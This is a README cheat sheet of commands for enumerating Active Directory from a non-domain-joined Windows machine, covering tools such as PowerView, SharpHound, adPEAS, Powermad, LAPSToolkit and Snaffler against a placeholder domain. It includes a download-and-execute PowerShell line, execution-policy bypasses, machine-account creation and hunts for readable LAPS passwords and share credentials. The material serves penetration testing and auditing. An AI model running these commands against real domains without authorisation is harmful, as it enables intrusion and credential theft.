└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | ## Active Directory Recon
  2 | ## Enumeration from a non-domain joined Windows computer
  3 | #### Note:
  4 | **Login as a local admin user and configure your system DNS server to be the IP address of a domain controller in the target domain firstly if the DNS is not configured automatically when the IP address is assigned.**\
  5 | `(Control Panel > Network and Internet > Network Connections > Ethernet Properties > IPv4 Properties)`\
  6 | Also, it can be set through the Powershell.
  7 | ```powershell
  8 | #Open a Powershell window as Administrator.
  9 | Get-NetAdapter; $index = $(Read-Host -Prompt '[*] Set index of interface '); $dnsIp = $(Read-Host -Prompt '[*] DC IP address ');
 10 | Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsIp
 11 | ```
 12 | So that you can resolve the target domain.
 13 | ```powershell
 14 | ping unsafe.local
 15 | nslookup unsafe.local
 16 | ```
 17 | After the below `runas` commands, you must check to access SYSVOL and NETLOGON folders with the following command: 
 18 | ```powershell
 19 | net view \\unsafe.local\
 20 | ```
 21 | You must see the SYSVOL and NETLOGON folders if you supply a valid password for the "runas" command.
 22 | 
 23 | <br/>
 24 | 
 25 | **Nslookup**
 26 | ```powershell
 27 | #For finding DCs
 28 | C:\> nslookup
 29 |    > set type=SRV
 30 |    > _ldap._tcp.dc._msdcs.unsafe.local
 31 |    
 32 | #To find all of the available records
 33 | C:\> nslookup -type=any unsafe.local
 34 | ```
 35 | <br/>
 36 | 
 37 | **Gpresult**
 38 | ```powershell
 39 | #Displays verbose policy information for remote computer
 40 | gpresult /v /s target-IP /u username /p password /scope computer
 41 | gpresult /z /s target-IP /u username /p password /scope computer
 42 | 
 43 | #Displays RSoP summary data for remote computer
 44 | gpresult /r /s target-IP /u username /p password /scope computer
 45 | ```
 46 | <br/>
 47 | 
 48 | **RSAT**
 49 | ```powershell
 50 | #1. Download and install RSAT
 51 | #2. Run cmd.exe as Administrator
 52 | #3. Spawn a MMC as a user in that domain using runas and its /netonly flag and enter the password.
 53 | C:\> runas /netonly /user:UNSAFE\ruser "mmc /server=unsafe.local"
 54 | 
 55 | #4. File > Open > File name: C:\Windows\System32 > dsa (for example) > click
 56 | ```
 57 | ```powershell
 58 | Powershell ActiveDirectory Module
 59 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
 60 | C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
 61 | 
 62 | #2. Running cmdlets
 63 | C:\> Get-ADDomain -Server DC1.unsafe.local
 64 | C:\> Get-ADUser -Identity luser -Server DC_IP_address -Properties *
 65 | ```
 66 | ```powershell
 67 | Netdom
 68 | # List workstation, server, dc, pdc, fsmo and trust information
 69 | C:\> netdom query fsmo /domain:unsafe.local
 70 | C:\> netdom query workstation /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
 71 | C:\> netdom query server /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
 72 | C:\> netdom query dc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
 73 | C:\> netdom query pdc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
 74 | C:\> netdom query trust /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
 75 | 
 76 | # Adding a computer account
 77 | C:\> netdom add /d:unsafe.local machine /ud:UNSAFE\luser /pd:S3cP@ss
 78 | ```
 79 | ```powershell
 80 | Dsquery
 81 | # List workstation, dc, ou, site information and query with LDAP filter
 82 | C:\> dsquery user -u unsafe\luser -p P@ssw0rd -d unsafe.local
 83 | C:\> dsquery computer -u unsafe\luser -p P@ssw0rd -d unsafe.local
 84 | C:\> dsquery ou -u unsafe\luser -p P@ssw0rd -d unsafe.local
 85 | C:\> dsquery site -u unsafe\luser -p P@ssw0rd -d unsafe.local
 86 | C:\> dsquery server -u unsafe\luser -p P@ssw0rd -d unsafe.local
 87 | C:\> dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" -u unsafe\luser -p P@ssw0rd -d unsafe.local
 88 | C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl -u unsafe\luser -p P@ssw0rd -d unsafe.local
 89 | ```
 90 | <br/>
 91 | 
 92 | **PowerView**
 93 | ```powershell
 94 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
 95 | C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
 96 | 
 97 | #2. Set Execution policy as Bypass
 98 | Set-ExecutionPolicy Bypass -Scope CurrentUser
 99 | 
100 | #3. Import Module
101 | Import-Module C:\Users\desktop2\Desktop\AD-Tools\Tools\PowerView_dev.ps1
102 | 
103 | #4. Running a cmdlet
104 | Get-NetDomain
105 | ```
106 | <br/>
107 | 
108 | **ADACLScanner (unstable)**
109 | ```powershell
110 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
111 | C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
112 | 
113 | #2. Set Execution policy as Bypass
114 |  Set-ExecutionPolicy Bypass -Scope CurrentUser
115 | 
116 | #3. Generate a report from the command line:
117 |  .\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -Output HTML -Show
118 |  .\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -EffectiveRightsPrincipal ruser -Output HTML -Show
119 | ```
120 | <br/>
121 | 
122 | **adPEAS**
123 | ```powershell
124 | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1')
125 | 
126 | #Bloodhound module is excluded
127 | Invoke-adPEAS -Domain unsafe.local -Username 'unsafe\luser' -Password 'S3cP@ss' -Module Domain,CA,Creds,Delegation,Accounts,Computer -Vulns
128 | ```
129 | <br/>
130 | 
131 | **ADRecon**
132 | ```powershell
133 | # To run ADRecon on a non-member host using LDAP.
134 | PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>
135 | ```
136 | <br/>
137 | 
138 | **SharpHound**
139 | ```powershell
140 | #Method 1
141 | #1. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
142 | C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
143 | 
144 | #2. Run SharpHound, using the -d flag to specify the AD domain you want to collect information from. You can also use any other flags you wish.
145 | C:\> SharpHound.exe -d unsafe.local -c All --outputdirectory C:\Users\desktop2\Desktop
146 | 
147 | #3. For session loop collection method (default 2 hours)
148 | C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop
149 | C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --Loopduration 01:00:00
150 | 
151 | #Method 2
152 | C:\> SharpHound.exe -d unsafe.local -c All --ldapusername ruser --ldappassword Password
153 | C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --ldapusername ruser --ldappassword Password
154 | C:\> SharpHound.exe -d unsafe.local --CollectionMethods LoggedOn --ldapusername ruser --ldappassword Password
155 | 
156 | #Note: After uploading the data to Bloodhound, AD-miner can be executed.
157 | AD-miner -c -cf Report -u neo4j -p mypassword
158 | ```
159 | <br/>
160 | 
161 | **PurpleKnight**
162 | ```powershell
163 | #1. Download PurpleKnight and unzip the archive
164 | #2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
165 | C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
166 | 
167 | #3. Set Execution policy as Bypass
168 | C:\> powershell -c "Set-ExecutionPolicy Bypass -Scope CurrentUser"
169 | 
170 | #4. Run the executable from CMD
171 | C:\> .\PurpleKnight.exe
172 | 
173 | #5. It will be opened and not detect a forest as expected. Type the domain name (e.g: unsafe.local) and click select > next > 'run tests'.
174 | ```
175 | <br/>
176 | 
177 | **Pingcastle**
178 | ```powershell
179 | #1. Download Pingcastle and unzip the archive
180 | #2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
181 | C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
182 | 
183 | #3. Generate a HTML healthcheck report for domain:
184 | C:\> .\PingCastle.exe --log --healthcheck --server unsafe.local
185 | 
186 | #4. To scan for the Zerologon vulnerability:
187 | C:\> .\PingCastle.exe --log --scanner zerologon --server unsafe.local
188 | ```
189 | <br/>
190 | 
191 | **.Net System.DirectoryServices.ActiveDirectory namespace**
192 | ```powershell
193 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
194 | runas /netonly /user:UNSAFE\ruser powershell.exe
195 | 
196 | #Get the forest information:
197 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
198 | 
199 | #Get the current user's domain information:
200 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
201 | 
202 | #Get information of DCs:
203 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
204 | 
205 | #Find Primary DC:
206 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().pdcroleowner
207 | 
208 | #Find Schema Master:
209 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Forest.SchemaRoleOwner
210 | 
211 | #Get trusts for forest:
212 | $forest = "unsafe.local"
213 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $forest)))).GetAllTrustRelationships()
214 | 
215 | #Get trusts for current domain:
216 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
217 | 
218 | #Get a list of sites in the forest:
219 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().sites
220 | 
221 | #Determine the SID filtering status of a trust. If the output is "true", SID filtering is enabled.
222 | $domain="gotham.unsafe.local"
223 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetSidFilteringStatus($domain)
224 | ```
225 | <br/>
226 | 
227 | **Powermad**
228 | ```powershell
229 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
230 | C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
231 | 
232 | #2. Set Execution policy as Bypass
233 | Set-ExecutionPolicy Bypass -Scope CurrentUser
234 | 
235 | #3. Import Module
236 | Import-Module .\Powermad.ps1
237 | 
238 | #4. Add a machine account
239 | $pass = ConvertTo-SecureString "MaQ.321" -AsPlainText -Force
240 | New-MachineAccount -MachineAccount maq -Password $pass -Verbose
241 | 
242 | # Get an attribute value of the machine account
243 | Get-MachineAccountAttribute -MachineAccount maq -Attribute distinguishedname
244 | 
245 | # Get SID of the machine account creator (ms-DS-CreatorSID)
246 | Get-MachineAccountCreator -DistinguishedName "CN=maq,CN=Computers,DC=unsafe,DC=local"
247 | Get-MachineAccountCreator
248 | 
249 | # Set an attribute value of the machine account
250 | Set-MachineAccountAttribute -MachineAccount maq -Attribute description -Value test
251 | 
252 | # Disable the machine account
253 | Disable-MachineAccount -MachineAccount maq
254 | ```
255 | <br/>
256 | 
257 | **LAPSToolkit**
258 | ```powershell
259 | #1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
260 | C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
261 | 
262 | #2. Set Execution policy as Bypass
263 | Set-ExecutionPolicy Bypass -Scope CurrentUser
264 | 
265 | #3. Import Module
266 | Import-Module .\LAPSToolkit.ps1
267 | 
268 | #4. Displays all computers with LAPS enabled
269 | Get-LAPSComputers
270 | 
271 | #5. Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute.
272 | Find-LAPSDelegatedGroups
273 | 
274 | #6. Checks the rights on each computer with LAPS enabled for any groups with read access and users with AllExtendedRights.
275 | Find-AdmPwdExtendedRights
276 | ```
277 | <br/>
278 | 
279 | **LDAPMonitor**
280 | ```powershell
281 | # For monitoring creation, deletion and changes to LDAP objects
282 | C:\> SharpLDAPmonitor.exe /dcip:DC_IP_address /user:UNSAFE\luser /pass:S3cP@ss
283 | ```
284 | <br/>
285 | 
286 | **Snaffler**
287 | ```powershell
288 | #1. Spawn a CMD as a user in that domain using runas and its /netonly flag and enter the password.
289 | C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
290 | 
291 | #2. Fire up Snaffler
292 | C:\> Snaffler.exe -s -d unsafe.local -c [DomainController-IP] -o snaffler.log
293 | ```
294 | <br/>
295 | 
296 | #### Reference
297 | https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html \
298 | https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html \
299 | https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc772217(v=ws.11) \
300 | https://github.com/p0dalirius/LDAPmonitor \
301 | https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps \
302 | https://github.com/61106960/adPEAS \
303 | https://github.com/Kevin-Robertson/Powermad \
304 | https://github.com/leoloobeek/LAPSToolkit \
305 | https://www.pingcastle.com/ \
306 | https://www.purple-knight.com/ \
307 | https://github.com/SnaffCon/Snaffler \
308 | https://github.com/sense-of-security/ADRecon \
309 | https://github.com/Mazars-Tech/AD_Miner 
310 | 


--------------------------------------------------------------------------------